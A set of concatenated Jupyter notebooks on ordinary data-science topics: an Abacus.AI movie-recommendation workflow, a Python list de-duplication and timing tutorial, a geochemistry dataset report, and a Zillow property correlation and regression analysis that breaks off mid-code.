#@title Abacus.AI API Key
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
client.list_use_cases()
#@title Abacus.AI Use Case
use_case = 'USER_RELATED' #@param {type: "string"}
for requirement in client.describe_use_case_requirements(use_case):
pp.pprint(requirement.to_dict())
related_items_project = client.create_project(name='Related Movies', use_case=use_case)
related_items_project.to_dict()
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/movies_metadata.csv')
pd.read_csv('https://s3.amazonaws.com//realityengines.exampledatasets/user_recommendations/users_metadata.csv')
user_item_dataset = client.create_dataset_from_file_connector(name='User Item Recommendations', table_name='User_Item_Recommendations',
location='s3://realityengines.exampledatasets/user_recommendations/user_movie_ratings.csv',
refresh_schedule='0 12 * * *')
movie_attributes_dataset = client.create_dataset_from_file_connector(name='Movie Attributes', table_name='Movie_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/movies_metadata.csv',
refresh_schedule='0 12 * * *')
user_attributes_dataset = client.create_dataset_from_file_connector(name='User Attributes', table_name='User_Attributes',
location='s3://realityengines.exampledatasets/user_recommendations/users_metadata.csv',
refresh_schedule='0 12 * * *')
datasets = [user_item_dataset, movie_attributes_dataset, user_attributes_dataset]
for dataset in datasets:
dataset.wait_for_inspection()
feature_group = client.create_feature_group(table_name='Related_Items1',sql='select * from User_Item_Recommendations')
client.add_feature_group_to_project(feature_group_id=feature_group.feature_group_id,project_id = related_items_project.project_id)
client.set_feature_group_type(feature_group_id=feature_group.feature_group_id, project_id = related_items_project.project_id, feature_group_type= "USER_ITEM_INTERACTIONS")
client.get_feature_group_schema(feature_group_id=feature_group.feature_group_id)
client.describe_use_case_requirements(use_case)[0].allowed_feature_mappings
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id, feature_name='movie_id', feature_mapping='ITEM_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='user_id', feature_mapping='USER_ID')
client.set_feature_mapping(project_id=related_items_project.project_id, feature_group_id= feature_group.feature_group_id,feature_name='timestamp', feature_mapping='TIMESTAMP')
client.use_feature_group_for_training(project_id=related_items_project.project_id, feature_group_id=feature_group.feature_group_id)
related_items_project.validate()
related_items_project.get_training_config_options()
related_items_model = related_items_project.train_model(training_config={})
related_items_model.to_dict()
related_items_model.wait_for_evaluation()
!pip install abacusai
import pandas as pd
import pprint
pp = pprint.PrettyPrinter(indent=2)
api_key = '' #@param {type: "string"}
from abacusai import ApiClient
client = ApiClient(api_key)
related_items_project = next(project for project in client.list_projects() if project.name == 'Related Movies')
related_items_model = related_items_project.list_models()[-1]
related_items_model.wait_for_evaluation()
pp.pprint(related_items_model.get_metrics().to_dict())
related_items_deployment = client.create_deployment(name='Related Items Deployment',description='Related Items Deployment',model_id=related_items_model.model_id)
related_items_deployment.wait_for_deployment()
deployment_token = related_items_project.create_deployment_token().deployment_token
deployment_token
ApiClient().get_related_items(deployment_token=deployment_token,
deployment_id=related_items_deployment.deployment_id,
query_data={"user_id":"1","movie_id":"466"})
| 0.321247 | 0.972257 |
# Remove Duplicates From A Sequence
While you have the ability to sort your iterables, it will no longer have the same sequence.
Here's a couple of options to remove dupes and still keep your sequence.
<div class="alert alert-info">
<b>Assume the following...</b>
```python
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
```
</div>
<div class="alert alert-success">
<b>Option 1</b>
```python
def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list
print(filter_list(temp_list))
```
</div>
Here's an alternative and can be used only if the values in the sequence are [hashable](https://docs.python.org/3/glossary.html)...
Which means the value never changes and can be compared to other objects.
<div class="alert alert-success">
<b>Option 2</b>
```python
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
```
</div>
And as always, there is more than one way to code - just [check this out](https://www.peterbe.com/plog/uniqifiers-benchmark)!
Now for the examples above ...
They both have the same number of lines of code ...
Is there a difference?
How can you know which is better?
By testing!
You can [check out these python speed/performance tips](https://wiki.python.org/moin/PythonSpeed/PerformanceTips), use [timeit](https://docs.python.org/3/library/timeit.html), and for the real nitty gritty? Checkout [python profilers](https://docs.python.org/3/library/profile.html).
<div class="alert alert-info">
<b>Try this for Option 1!</b>
```python
import timeit
SETUP = '''def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list'''
TEST_CODE = '''filter_list(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer'])'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
```
</div>
```
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
```
<div class="alert alert-info">
<b>Try this for Option 2!</b>
```python
import timeit
SETUP = '''def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen'''
TEST_CODE = '''list(filter_list2(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']))'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
```
</div>
So even though it be fancy ... is it better? Not with this small set. But it might be for a larger one or a different kind of sequence.
That's why it's important to know how to test your code and determine which tricks might be best for your needs.
## What About A List Of Dictionaries?
(to be continued ...)
|
github_jupyter
|
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list
print(filter_list(temp_list))
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
import timeit
SETUP = '''def filter_list(input_list:list):
"""
This function takes in an iterable (tested only for lists).
Returns the same list in order but without duplicates.
"""
temp_list = []
for item in input_list:
if item in temp_list:
continue
temp_list.append(item)
return temp_list'''
TEST_CODE = '''filter_list(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer'])'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
temp_list = ['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']
def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen
print(list(filter_list2(temp_list)))
import timeit
SETUP = '''def filter_list2(input_data):
"""
This function takes in a sequence.
Returns the same list in order but without duplicates.
"""
found = set()
for item in input_data:
if item not in found:
yield item
found.add(item) # no need to keep sequence of what's been seen'''
TEST_CODE = '''list(filter_list2(['duck', 'cat', 'dog', 'deer', 'fish', 'dog', 'rooster', 'lion', 'deer']))'''
print(timeit.timeit(setup=SETUP, stmt=TEST_CODE))
| 0.39129 | 0.898411 |
# Data Reporting and Communication - Geochemistry Example
This notebook is an example of going through the data report process to illustrate some aspects you may want to highlight (see the other pm notebook). This example data report is principally based on data which is relatively clean already - to highlight the key parts of the exercise without getting bogged down in the details of data munging which are often dataset specific.
## Read the Docs
As we're working with new datasets, new types of data, and different domains, you might want to put together an analysis or visualisation which we haven't yet encountered. We'd suggest that you check out the documentation pages for some of the key packages if you're after something specific, or you run into an error you can trace back to these libraries:
- [matplotlib](https://matplotlib.org/) for basic plotting (but allows control of many details where needed)
- [pandas](https://pandas.pydata.org) for data handling (our dataframe library)
- [seaborn](https://seaborn.pydata.org) for _nice_ data visualization
- [scipy](https://scipy.org) for scientific libraries (particularly `scipy.stats` which we'll use for fitting some more unusual probability distributions), and
- [statsmodels](https://www.statsmodels.org/stable/index.html) which gives us some more expressive curve fitting approaches, should you wish to use them
## Import Your Dataset
This specific example is a dataset from my own research - it's an early version of a dataset I've put together to see whether we can effectively tell in which setting a rock formed based on its chemistry (tectonic setting classificaiton/discrimination).
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
```
I've added the dataset to Onedrive for this exercise - here we download it directly from there into memory:
```
from fetch import get_onedrive_directlink
# here I've added a direct link to a compressed dataset stored in Onedrive
df = pd.read_csv(get_onedrive_directlink('https://1drv.ms/u/s!As2ibEui13xmlv567184QOhGfNmQDQ?e=l1ghpZ'), compression='zip')
df.drop(columns=df.columns[0], inplace=True) # an index snuck in here - we don't need it
df.head()
df.info()
```
---
## Why was this dataset collected/recorded?
* What would you like to do with it? Is it amendable to that use case?
* Does it have obvious limitations or restrictions to how it might be used?
* Is the data limited in relevance to a particular time period, area or site?
---
<em>
* This dataset was aggregated for the purpose of building a model to classify the setting in which different igneous rocks formed based on their geochemistry.
* The tectonic settings are assigned based on geographical location - it is more complicated in some tectonic scenarios or where there might be overlap through space or in geological time.
* These rocks are all relatively recent (up to a few hundred million yeras old at most), and whether these samples are useful for classifying older rocks is uncertain.
* Whether these tectonic settings existed at all as you go further back in time is actually contentious - so the classificaiton problem isn't well formed under these scenarios.
* This dataset isn't likely to be directly useful to investigation of sedimentary rocks (although in some casees it could provide a some relevant info..), and may or may not be useful for looking at metamorphosed rocks
* Most of the samples are from land!
</em>
---
## Why might I be interested?
* What else might this be useful for?
* Could this be linked or integrated with another dataset?
* Could your solution to the problem be re-used in another area of the business?
---
<em>
* This relatively diverse dataset could be used for a variety of classificaiton and regression problems
* It would also be a handy reference for where you may want background values to provide geological context, or a basis for imputing 'missing' geochemical values for igneous rocks
* The geochemical variables in this dataset should be directly comparable to most other lithogeochemical datasets - and hence could be easily integrated. Some of the isotope ratios may need to be converted to different units or forms; some of the locations may also need to be converted.
* Only some of the samples have accurate positioning, and few have a 'depth' parameter (most are likely surface or near-surface samples rather than drilled).
* The classificaiton workflow developed for this problem can readily be adapted to many other geochemical and mineralogical classification problems.
</em>
---
## How big a dataset are we talking?
This one is relatively straightfoward, but provides some first-order constraints on what we may be able to do with it, and how you might want to work with your data:
* Number of records
* Number of variables
* Size on disk
---
```
df.index.size
df.columns.size
df.info(memory_usage="deep")
```
---
* Are there multiple groups of records within your dataset (e.g. multiple sites, machines, instances or time periods)?
* Is your target variable likely to be dependent on these groupings/is this key grouping your target variable (i.e. a classification problem)?
* Are there similar numbers of records for each of these groups, or is it a bit imbalanced?
---
*My target variable is the principal grouping, which I've encoded as eight categories:*
* Back arc basins (BAB)
* Continental arcs (CA)
* Continental flood basalts (CF)
* Island arcs (IA)
* Intra-oceanic arcs (IOA)
* Mid-Ocean Ridge basalts (MOR)
* Ocean Island basalts (OI)
* Oceanic plateuas (OP)
*
```
df.Srcidx.unique()
```
*This is a reasonably imbalanced dataset!*
```
df.Srcidx.value_counts()
```
---
* Is the dataset in a tidy format? How might you need to rearrange it if not?
1. Each variable you measure should be in one column.
2. Each different observation of that variable should be in a different row.
<!-- <div class='alert alert-success'> -->
<b>Note:</b> the last two tidy data points about separate tables are excluded here; for most ML applications you'll need a single fully-integrated table. Depending on your dataset, it may make sense to keep individual table separate until after data processing, however.
<!-- </div> -->
---
*This dataset is already quite tidy for a single-table dataset (although this took some munging...!)*
---
* If your records relate to individual measurements or samples, are they regularly spaced (in time and/or space)? What's the frequency of the records?
---
*These samples are unevenly distributed across the globe; some parts of the world might not have much data (although not all samples have point locations!):*
```
ax = df.plot.scatter('Longitude', 'Latitude', color='g')
ax.scatter(df[['Longitudemin', 'Longitudemax']].mean(axis=1), df[['Latitudemin', 'Latitudemax']].mean(axis=1), color='purple')
```
---
## What are the variables?
Provide an overview of the types and groupings of variables, where relevant:
* What are the variable names? Should you rename these for clarity?
---
<em>
* Some of the variables have overlap (espeically for metadata) - and some of the names could be updated for clarity (e.g. 'Srcidx' isn't very informative!).
* The geochemical data is labelled in a straightfoward way.
* The variables L0-L3 are parameterisations of geochemistry and could be more verbosely named.
</em>
```
df.columns.tolist()#[:20]
```
---
* Which variables are your targets (what you want to predict) and which are your likely inputs (what you'll use to predict your target)?
---
<em>
* Here the target is the tectonic setting category in <b>Srcidx</b>, and most of the geochemical data variables are vaiable inputs.
* The metadata may not be particularly useful in this case, especially given that it's not univeral across all samples.
</em>
---
* How have the variables been measured/recorded?
* Are units are important? Is the entire table in a consistent format/set of units?
---
<em>
* The geochemical data have been measured using a variety of techniques (and to some degree the individual records represent multiple analyses).
* Geochemical data recorded as elements (e.g. 'Cr') are in units of ppm; data recorded as oxides (e.g. 'Cr2O3') are in units of Wt%.
</em>
```
fig, ax = plt.subplots(1, 2, figsize=(8, 4))
bins = np.linspace(0, 1000, 100)
df['Cr'].plot.hist(bins=bins, ax=ax[0])
df['Cr2O3'].plot.hist(bins=bins/10000, ax=ax[1]) # wt%/ppm = 10000 - this should be a comparable scale!
ax[0].set(xlabel='Cr (ppm)')
ax[1].set(xlabel='Cr2O3 (Wt%)')
plt.tight_layout()
```
---
* Are variables in the right formats?
* Have some numerical variables been converted to strings/objects?
* Are dates recorded in a convenient format?
* Do you have [categorical](https://pandas.pydata.org/pandas-docs/stable/user_guide/categorical.html) variables which you could appropriately encode?
---
*Data are largely in the correct formats - although geological ages aren't here converted to dates....*
```
df.dtypes.head()
```
---
* Are some data missing?
* Are they randomly or systemtically missing?
* Is there a correlation between 'missingness' across variables?
* How is missing data recorded? Are there more than one form of missing data, and if so do you want to retain that information (e.g. 'below detection', 'not measured')?
* What are your options for [dealing with the missing data](https://pandas.pydata.org/pandas-docs/stable/user_guide/missing_data.html)? Do you need to drop these rows, or can you fill the values/impute the values?
---
<em>
* We have a number of columns which are missing most of the data
* In some cases data seem to be missing at random - but as we have compositional data it's partially missing due to being below a threshold for detection
* In many cases elements were simply not measured - which is partially due to methods, and partly due to choices for different rocks, so is not independent of our target variable!
* Missing data is here replaced with np.nan
* We could impute some missing data, but given the nature of the data it may be better to select a low-missingness subset of features...
</em>
```
percentage_present = (df.isnull().sum(axis=0) / df.index.size * 100)
percentage_present.to_frame().head(20).style.background_gradient(cmap='viridis_r')
```
---
* How are the variables distributed?
* Are they approximately normally distributed?
* Will you need to transform these before using them in a machine learning pipeline?
* What are appropriate values for your target variable (i.e. continuous real values, continous positive values, boolean, categories)?
---
<em>
* Geochemical data are not expected to be normally distributed - instead they're likely to approximately log-normally distributed (or more specifically ratios of geochemical variables are expected to be..)
* As such some transformation will likely be needed.
* In this case the target variable is categorical, so is well bounded - we don't need to worry about continuous values here!
* We might have some precision issues (e.g. see Cr2O3)
* We will have some 'below detection' truncation
* Data for the same element will be distributed differently if it's recorded as an oxide or element (e.g. Cr vs Cr2O3; partly due to methods and relative detection limits)
</em>
```
ax = df.Cr2O3.plot.hist(bins=bins/10000)
ax.vlines(np.arange(0, 0.11, 0.01), ymin=190, ymax=200, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, sharey=True)
df.Cr.plot.hist(bins=bins, color='0.5', ax=ax[0])
logbins = np.linspace(np.log(bins[1]), np.log(bins[-1]), 100)
df.Cr.apply(np.log).plot.hist(bins=logbins, color='0.5', ax=ax[1]) # compare log-scaled data over the same range
ax = df['Th'].plot.hist(bins=bins/100)
ax.vlines(np.arange(0, 10, 1), ymin=1400, ymax=1500, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, figsize=(10, 4))
df['Ti'].plot.hist(bins=100, ax=ax[0])
df['TiO2'].plot.hist(bins=np.linspace(0, 6, 100), ax=ax[1])
ax[0].set(xlabel='Ti (ppm)')
ax[0].set(xlabel='TiO2 (wt%)')
plt.tight_layout()
```
---
* What do the correlations of variables look like? Are there 'blocks' or groups of variables which are correlated with one another, or is each providing different information?
---
<em>
* There are some strong correlations and 'blocks' within the dataset - one of these is the Rare Earth Elements!
* There is some variety in the structure - different elements seem to be providing independent information.
* Some parameters are either perfectly or nearly-perfectly correlated (e.g. ratios and normalised ratios, location min-max pairs)
</em>
```
corr = df.corr()
f, ax = plt.subplots(figsize=(14, 14))
sns.heatmap(corr, square=True, linewidths=0.01, cbar_kws={"shrink": .8}, cmap='viridis')
```
---
* Are there outliers?
* Are they related to incorrect data, rare events or potential data entry issues?
* Are they likely to have a negative impact on your model, or are they an inherent feature of the dataset?
* If you're to remove them, what's a good way of selecting them?
---
*Perhaps - but distinguishing 'outliers' from strange rocks might not be something I can confidently do based on the data alone (and a single sample of each rock..). For this reason I'll leave them in for the time being - unless I can establish clear data-driven reasons for their exclusion.*
---
## Visualising Key Relationships
* What are some key relationships within your dataset?
---
*A key visualisation which is used for the graphical equivalent of this task is the 'Pearce plot' - a plot of Th/Yb over Nb/Yb (illustrating reasonable separation for just two/three dimensions..):*
```
fig, ax = plt.subplots(1, figsize=(8, 6))
variables = ['Nb/Yb', 'Th/Yb']
ax.set(yscale='log', xscale='log', xlabel=variables[0], ylabel=variables[1])
for setting, subdf in df.groupby('Srcidx'):
ax.scatter(*subdf[variables].T.values, label=setting, alpha=0.8/np.log(subdf.index.size))
# add a legend and alter the opacity so we can see what's what
leg = ax.legend(frameon=False, facecolor=None, bbox_to_anchor=(1,1))
for lh in leg.legendHandles:
lh.set_alpha(1)
```
---
* How might you investigate this dataset further?
---
---
* Do you expect any major hurdles for getting this dataset analysis ready? Are there any key decisions you need to make about pre-processing?
---
<em>
* Dealing with missing data
* Identifying subtle errors in data entry/units
* Dealing with imprecision issues
* Identifying poor quality analyses
* Spatial coverage, biases and validity
* & more...
</em>
---
## Optional: Find another dataset that we could fuse with this one.
* Are there other datasets which might provide some additional context to solve your problem (e.g. bringing in data from logs, weather data, imagery)?
---
---
* Could your dataset be integrated with data from further along the processing chain/another part of the business to solve problems there?
---
|
github_jupyter
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
from fetch import get_onedrive_directlink
# here I've added a direct link to a compressed dataset stored in Onedrive
df = pd.read_csv(get_onedrive_directlink('https://1drv.ms/u/s!As2ibEui13xmlv567184QOhGfNmQDQ?e=l1ghpZ'), compression='zip')
df.drop(columns=df.columns[0], inplace=True) # an index snuck in here - we don't need it
df.head()
df.info()
df.index.size
df.columns.size
df.info(memory_usage="deep")
df.Srcidx.unique()
df.Srcidx.value_counts()
ax = df.plot.scatter('Longitude', 'Latitude', color='g')
ax.scatter(df[['Longitudemin', 'Longitudemax']].mean(axis=1), df[['Latitudemin', 'Latitudemax']].mean(axis=1), color='purple')
df.columns.tolist()#[:20]
fig, ax = plt.subplots(1, 2, figsize=(8, 4))
bins = np.linspace(0, 1000, 100)
df['Cr'].plot.hist(bins=bins, ax=ax[0])
df['Cr2O3'].plot.hist(bins=bins/10000, ax=ax[1]) # wt%/ppm = 10000 - this should be a comparable scale!
ax[0].set(xlabel='Cr (ppm)')
ax[1].set(xlabel='Cr2O3 (Wt%)')
plt.tight_layout()
df.dtypes.head()
percentage_present = (df.isnull().sum(axis=0) / df.index.size * 100)
percentage_present.to_frame().head(20).style.background_gradient(cmap='viridis_r')
ax = df.Cr2O3.plot.hist(bins=bins/10000)
ax.vlines(np.arange(0, 0.11, 0.01), ymin=190, ymax=200, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, sharey=True)
df.Cr.plot.hist(bins=bins, color='0.5', ax=ax[0])
logbins = np.linspace(np.log(bins[1]), np.log(bins[-1]), 100)
df.Cr.apply(np.log).plot.hist(bins=logbins, color='0.5', ax=ax[1]) # compare log-scaled data over the same range
ax = df['Th'].plot.hist(bins=bins/100)
ax.vlines(np.arange(0, 10, 1), ymin=1400, ymax=1500, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, figsize=(10, 4))
df['Ti'].plot.hist(bins=100, ax=ax[0])
df['TiO2'].plot.hist(bins=np.linspace(0, 6, 100), ax=ax[1])
ax[0].set(xlabel='Ti (ppm)')
ax[0].set(xlabel='TiO2 (wt%)')
plt.tight_layout()
corr = df.corr()
f, ax = plt.subplots(figsize=(14, 14))
sns.heatmap(corr, square=True, linewidths=0.01, cbar_kws={"shrink": .8}, cmap='viridis')
fig, ax = plt.subplots(1, figsize=(8, 6))
variables = ['Nb/Yb', 'Th/Yb']
ax.set(yscale='log', xscale='log', xlabel=variables[0], ylabel=variables[1])
for setting, subdf in df.groupby('Srcidx'):
ax.scatter(*subdf[variables].T.values, label=setting, alpha=0.8/np.log(subdf.index.size))
# add a legend and alter the opacity so we can see what's what
leg = ax.legend(frameon=False, facecolor=None, bbox_to_anchor=(1,1))
for lh in leg.legendHandles:
lh.set_alpha(1)
| 0.526099 | 0.988788 |
### Part 1
I will to find the correlation between the following properties
- Bedroom Count
- Building Quality Type
- Calculated Finished Square Feet
- Number of Stories
- Lot size
- Tax Amount
We will make use of **Pandas, Numpy, Matplotlib and Seaborn** libraries in Python. The first step is to import all the necessary libraries.
```
import pandas as pd
import numpy as np;
import seaborn.apionly as sns
import matplotlib.pyplot as plt
from sklearn import linear_model, preprocessing
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.svm import SVR
from scipy import stats
```
The next step is to read the data file given in the form of a **.csv** file.
```
data = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'bedroomcnt',
'buildingqualitytypeid',
'calculatedfinishedsquarefeet',
'numberofstories',
'lotsizesquarefeet',
'taxamount',
], index_col='parcelid')
```
Now we should include the logerror values in our **Pandas** *dataframe* so that we can find the correlation between the log error and other features.
```
logerror_data = pd.read_csv('data/train_2016_v2.csv', usecols=['parcelid','logerror'], index_col='parcelid')
```
Let's join the **logerror_data** with other features in the dataframe **data**. **Outer join** is used so that the new data frame contains the **union** of the **parcelid** in the two data frames.
```
data = data.join(logerror_data, how='outer')
```
I'm renaming the column names in the data frame for easy representation in the correlation matrix.
```
data_renamed = data.rename(index=str, columns={'bedroomcnt':'BedCnt',
'buildingqualitytypeid':'BldnQlty',
'calculatedfinishedsquarefeet':'sqFeet',
'numberofstories':'Stories',
'lotsizesquarefeet':'lotsize',
'taxamount':'tax'})
```
Compute the correlation matrix for **data**.
```
corr = data_renamed.corr()
```
For easy representation of data, I've presented the heatmap of the correlation matrix (Given Below) with the Feature names and Correlation Values on it. The code below does all the work to convert a heatmap to our specified format. Source[https://stackoverflow.com/questions/43507756/python-seaborn-how-to-replicate-corrplot]
```
mask = np.zeros_like(corr, dtype=np.bool) # returns an array of zeros of the same shape and size as corr mat
mask[np.triu_indices_from(mask)] = True # makes the upper triangle of mask as 1
# Set up the matplotlib figure
fig, ax = plt.subplots()
# Draw the heatmap with the mask and correct aspect ratio
vmax = np.abs(corr.values[~mask]).max()
sns.heatmap(corr, mask=mask, cmap=plt.cm.PuOr, vmin=-vmax, vmax=vmax,
square=True, linecolor="lightgray", linewidths=1, ax=ax) # Masks the upper triangle of the heatmap
for i in range(len(corr)):
ax.text(i+0.5,len(corr)-(i+0.5), corr.columns[i],
ha="center", va="center", rotation=45)
for j in range(i+1, len(corr)):
s = "{:.3f}".format(corr.values[i,j])
ax.text(j+0.5,len(corr)-(i+0.5),s,
ha="center", va="center")
ax.axis("off")
plt.show()
```
Some important observation from the above correlation matrix are:
- **Tax Amount and Total Square feet of the building** are highly correlated with the value 0.539.
- **Building Quality** is negatively correlated to all other features taken into account, which is interesting.
- Particularly, **building quality being negatively correlated to the Tax amount** is surprising.
- **Number of stories** in a building are positively correlated with both **Total Square feet** of the building and **Tax amount**.
- **Bedroom Count** is highly correlated with the **Total square feet** of the building which is understandable.
- **Log Error** is not heavily correlated with any of the features, with maximum being with **Square Feet**.
### Part 2
In this part, we have to present some information in this data in the form of plots. For this, first we need to **reset the index** of the data-frame from **parcelid** to a simple increasing sequence of numbers. Doing this will make the plot easier to analyze.
```
data_without_index = data_renamed.reset_index()
```
Now we are ready to see the scatter-plot of **Total Square Feet of the buildings** with the following code segment. Note that we're removing the **Nan** values from the data before plotting. We also remove the zeros.
```
sqFeet = data_without_index['sqFeet'][np.logical_not(np.isnan(data_without_index['sqFeet']))]
sqFeet = sqFeet[sqFeet > 100]
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
plt.show()
```
As it is clear, the above figure doesn't show much information about the distrubution because of large size of data and outliers. So let's try to plot the above figure **removing outliers** and limiting the count to **500** houses.
```
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
axes = plt.gca() # Stands for get the current axis
axes.set_ylim([0,10000])
axes.set_xlim([0,500])
plt.show()
```
Now this scatter plot is much more informative. It clearly shows that most houses are between **1000 - 3000 sq. feet**.
Now in the second plot, we will try to find out how many houses are from each county. For this, we'll use the Pie Chart.
```
county_arch = pd.read_csv('data/properties_2016.csv', usecols=['regionidcounty','architecturalstyletypeid'])
county_arch['regionidcounty'] = county_arch['regionidcounty'].replace([3101.0, 2061.0, 1286.0],
['Los Angeles', 'Orange', 'Ventura'])
county_arch['regionidcounty'].value_counts(normalize=False, sort=True, dropna=True).plot(kind='pie',autopct='%.2f')
plt.axis('equal')
plt.show()
county_arch_temp = county_arch['architecturalstyletypeid'].value_counts(normalize=False, sort=True, dropna=True)
county_arch_small_values_clubbed = county_arch_temp.head(4)
county_arch_temp = county_arch_temp.reset_index(drop=True)
if len(county_arch_temp) > 4:
county_arch_small_values_clubbed['Others'] = county_arch_temp[4:].sum()
county_arch_small_values_clubbed.plot(kind='pie',autopct='%.2f')
plt.legend()
plt.axis('equal')
plt.show()
```
Next we try to plot the line chart between Total area vs. Tax amount
```
area_tax = pd.concat([data_without_index['sqFeet'], data_without_index['tax']], axis=1, keys=['sqFeet', 'tax'])
area_tax['tax'] = area_tax['tax']/1000000
area_tax['sqFeet'] = area_tax[area_tax['sqFeet'] < 17000]['sqFeet']
area_tax = area_tax.dropna(axis=0, how='any')
y,binEdges=np.histogram(area_tax['sqFeet'], weights=area_tax['tax'],bins=100)
bincenters = 0.5*(binEdges[1:]+binEdges[:-1])
plt.plot(bincenters,y,'-')
plt.xlabel('Total Square Feet')
plt.ylabel('Tax Amount/1000000')
plt.title('Line Chart for the distrubution of Tax Amount vs. Total Square Feet', loc='right')
plt.show()
```
Next we plot the histogram for the distribution of logerror vs. Square Feet
```
area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
area_error['sqFeet'] = area_error[area_error['sqFeet'] < 17000]['sqFeet']
area_error = area_error.dropna(axis=0, how='any')
plt.hist(area_error['sqFeet'], weights=area_error['logerror'])
plt.show()
```
### Part 3
```
reg_area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
reg_area_error['sqFeet'] = reg_area_error[reg_area_error['sqFeet'] < 17000]['sqFeet']
reg_area_error = reg_area_error.dropna(axis=0, how='any')
result = np.polyfit(reg_area_error['sqFeet'], reg_area_error['logerror'],1)
print result
plt.plot(np.log2(reg_area_error['sqFeet']), reg_area_error['logerror'], 'o', ms=1)
plt.plot(np.log2(reg_area_error['sqFeet']), np.polyval(result, np.log2(reg_area_error['sqFeet'])), 'r-')
plt.show()
```
Now let's try linear regression on all factors. We will start by adding more features to the **data**.
```
more_features = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'basementsqft',
'bathroomcnt',
'fireplacecnt',
'garagecarcnt',
'garagetotalsqft',
'poolcnt',
'poolsizesum',
'yearbuilt'
], index_col='parcelid')
```
Join the **more_features** dataframe to the **data**.
```
data = data.join(more_features, how='outer')
```
Now let's see how many values we have after dropping the rows that contain any **Nan** values.
```
data_dropped_nan = data.dropna(axis=0, how='any')
print data_dropped_nan
```
As clear from the result, we don't have any rows in our data where all of the above values exist at the same time. So, to perform linear regression on this data, we'll replace the **Nan** with the **mean** of the data and take a portion of the dataset to analyze except the **logerror** field.
```
data_without_nan = data.drop('logerror',1).fillna(data.mean())
data_without_nan = data_without_nan.join(logerror_data, how='outer')
data_without_nan = data_without_nan.dropna(axis=0, how='any')
data_without_nan_noindex = data_without_nan.reset_index()
data_without_nan_noindex = data_without_nan_noindex.drop('parcelid',1)
data_without_logerror = data_without_nan_noindex.drop('logerror',1)
logerror = data_without_nan_noindex['logerror']
train_x = data_without_logerror.iloc[:45000,:]
test_x = data_without_logerror.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
```
Now lets test the regression model and analyze the results.
```
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
```
### Part 4
Reducing the number of parameters in linear regression. We will drop columns with too many Nan values. Here I've taken the columns with only a limited number of Nan Values. No extra replacement for the Nan values is required.
```
data_dropped_nans = data
for col in data_dropped_nans:
